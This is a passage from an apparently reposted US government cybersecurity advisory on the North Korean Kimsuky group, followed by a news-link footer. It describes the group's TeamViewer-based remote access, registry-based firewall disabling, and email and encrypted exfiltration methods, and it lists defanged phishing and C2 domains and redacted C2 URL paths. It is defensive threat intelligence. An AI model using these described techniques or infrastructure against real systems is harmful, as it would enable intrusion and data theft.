Kimsuky has used a modified TeamViewer client, version 5.0.9104, for Command and Control [TA0011] (Remote Access Software [T1219]). During the initial infection, the service “Remote Access Service” is created and adjusted to execute C:WindowsSystem32vcmon.exe at system startup (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]). Every time vcmon.exe is executed, it disables the firewall by zeroing out Registry values (Impair Defenses: Disable or Modify System Firewall [T1562.004]). The program then modifies the TeamViewer Registry settings by changing the TeamViewer strings in TeamViewer components. The launcher then configures several Registry values, including SecurityPasswordAES, that control how the remote access tool will work. The SecurityPasswordAES Registry value represents a hash of the password used by a remote user to connect to TeamViewer Client (Use Alternate Authentication Material: Pass the Hash [T1550.002]). This way, the attackers set a pre-shared authentication value to have access to the TeamViewer Client. The attacker will then execute the TeamViewer client netsvcs.exe.[58]

Kimsuky has been using a consistent format. In the URL used recently—express[.]php?op=1—there appears to be an option range from 1 to 3.[59]

Exfiltration

Open-source reporting from cybersecurity companies describes two different methods Kimsuky has used to exfiltrate stolen data: via email or through an RC4 key generated as an MD5 hash or a randomly generated 117-bytes buffer (Exfiltration [TA0010]).

There was no indication that the actor destroyed computers during the observed exfiltrations, suggesting Kimsuky’s intention is to steal information, not to disrupt computer networks. Kimsuky’s preferred method for sending or receiving exfiltrated information is through email, with their malware on the victim machine encrypting the data before sending it to a C2 server (Archive Collected Data [T1560]).  Kimsuky also sets up auto-forward rules within a victim’s email account (Email Collection: Email Forwarding Rule [T1114.003]).

Kimsuky also uses an RC4 key generated as an MD5 hash or a randomly generated 117-bytes buffer to exfiltrate stolen data. The data is sent RSA-encrypted (Encrypted Channel: Symmetric Cryptography [T1573.001]). Kimsuky’s malware constructs an 1120-bit public key and uses it to encrypt the 117-bytes buffer. The resulting data file is saved in C:Program FilesCommon FilesSystemOle DB (Data Staged: Local Data Staging [T1074.001]).[60]

Indicators of Compromise

Kimsuky has used the domains listed in table 1 to carry out its objectives:

For a downloadable copy of IOCs, see AA20-301A.stix.

Table 1: Domains used by Kimsuky

login.bignaver[.]com

nytimes.onekma[.]com

webuserinfo[.]com

member.navier.pe[.]hu

nid.naver.onektx[.]com

pro-navor[.]com

cloudnaver[.]com

read.tongilmoney[.]com

naver[.]pw

resetprofile[.]com

nid.naver.unicrefia[.]com

daurn[.]org

servicenidnaver[.]com

mail.unifsc[[.]com

naver.com[.]de

account.daurn.pe[.]hu

member.daum.unikortv[.]com

ns.onekorea[.]me

login.daum.unikortv[.]com

securetymail[.]com

riaver[.]site

account.daum.unikortv[.]com

help-navers[.]com

mailsnaver[.]com

daum.unikortv[.]com

beyondparallel.sslport[.]work

cloudmail[.]cloud
member.daum.uniex[.]kr

comment.poulsen[.]work

helpnaver[.]com

jonga[.]ml

impression.poulsen[.]work

view-naver[.]com

myaccounts.gmail.kr-infos[.]com

statement.poulsen[.]work

view-hanmail[.]net

naver.hol[.]es

demand.poulsen[.]work

login.daum.net-accounts[.]info

dept-dr.lab.hol[.]es

sankei.sslport[.]work

read-hanmail[.]net

Daurn.pe[.]hu

sts.desk-top[.]work

net.tm[.]ro

Bigfile.pe[.]hu

hogy.desk-top[.]work

daum.net[.]pl

Cdaum.pe[.]hu

kooo[.]gq

usernaver[.]com

eastsea.or[.]kr

tiosuaking[.]com

naver.com[.]ec

myaccount.nkaac[.]net

help.unikoreas[.]kr

naver.com[.]mx

naver.koreagov[.]com

resultview[.]com

naver.com[.]se

naver.onegov[.]com

account.daum.unikftc[.]kr

naver.com[.]cm

member-authorize[.]com

ww-naver[.]com

nid.naver.com[.]se

naver.unibok[.]kr

vilene.desk-top[.]work

csnaver[.]com

nid.naver.unibok[.]kr

amberalexander.ghtdev[.]com

nidnaver[.]email

read-naver[.]com

nidnaver[.]net

cooper[.]center

dubai-1[.]com

coinone.co[.]in

nidlogin.naver.corper[.]be

amberalexander.ghtdev[.]com

naver.com[.]pl

nid.naver.corper[.]be

gloole[.]net

naver[.]cx

naverdns[.]co

smtper[.]org

smtper[.]cz

naver.co[.]in

login.daum.kcrct[.]ml

myetherwallet.com[.]mx

downloadman06[.]com

login.outlook.kcrct[.]ml

myetherwallet.co[.]in

loadmanager07[.]com

top.naver.onekda[.]com

com-download[.]work

com-option[.]work

com-sslnet[.]work

com-vps[.]work

com-ssl[.]work

desk-top[.]work

intemet[.]work

jp-ssl[.]work

org-vip[.]work

sslport[.]work

sslserver[.]work

ssltop[.]work

taplist[.]work

vpstop[.]work

webmain[.]work

preview.manage.org-view[.]work

intranet.ohchr.account-protect[.]work

 

Table 2: Redacted domains used by Kimsuky

[REDACTED]/home/dwn[.]php?van=101

[REDACTED]/home/dwn[.]php?v%20an=101

[REDACTED]/home/dwn[.]php?van=102

[REDACTED]/home/up[.]php?id=NQDPDE

[REDACTED]/test/Update[.]php?wShell=201

 

To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [email protected]. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [email protected].

 

DISCLAIMER

 

This information is provided “as is” for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information.

The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.

Source…

North Korea’s ‘Reaper’ hacking group is stepping up its cyber warfare capabilities and is an ‘advanced persistent threat’

/in

  1. North Korea’s ‘Reaper’ hacking group is stepping up its cyber warfare capabilities and is an ‘advanced persistent threat’  Daily Mail

  2. US and North Korea planning ‘cyber war’ as hacker armies faces off  Daily Star
  3. Report Details North Korea’s Cyberwarfare Activities  Newsmax
  4. North Korea’s Growing Criminal Cyberthreat  Scientific American

    5. Full coverage

cyber warfare news – read more